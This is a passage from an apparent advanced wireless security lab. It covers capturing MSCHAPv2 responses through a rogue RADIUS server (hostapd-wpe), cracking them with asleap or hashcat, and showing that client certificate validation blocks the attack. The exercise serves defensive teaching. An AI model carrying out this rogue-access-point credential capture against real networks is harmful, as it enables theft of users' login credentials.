  2. Client connection: Connect a test client that does NOT validate the server certificate. Observe the MSCHAPv2 challenge/response logged by hostapd-wpe; the client hands over the response inside the TLS tunnel it built to the rogue server, before any user-visible failure
  3. Credential cracking: Use asleap or hashcat (mode 5500, NetNTLMv1/MSCHAPv2) to crack the captured challenge/response against a wordlist
  4. Certificate validation test: Now configure the test client with proper server certificate validation: trust only the CA that issued the legitimate RADIUS server's certificate and set the expected server name (in wpa_supplicant, ca_cert and domain_match), or pin the server certificate itself. Attempt the same attack and observe that the client rejects the rogue certificate and never sends the MSCHAPv2 response
  5. Documentation: Write a findings report explaining the vulnerability, the difference certificate validation makes, and how to deploy validated wireless profiles through MDM or Group Policy across an organization

Difficulty: Advanced Objectives: Understand enterprise wireless attack techniques and the importance of certificate validation. Key Takeaway: This exercise demonstrates that WPA2-Enterprise with PEAP/MSCHAPv2 is only as secure as the client configuration. Without server certificate validation (a trusted CA plus an expected server name, or pinning), a client will authenticate to any rogue RADIUS server that advertises the right SSID, and the MSCHAPv2 response it sends is crackable offline.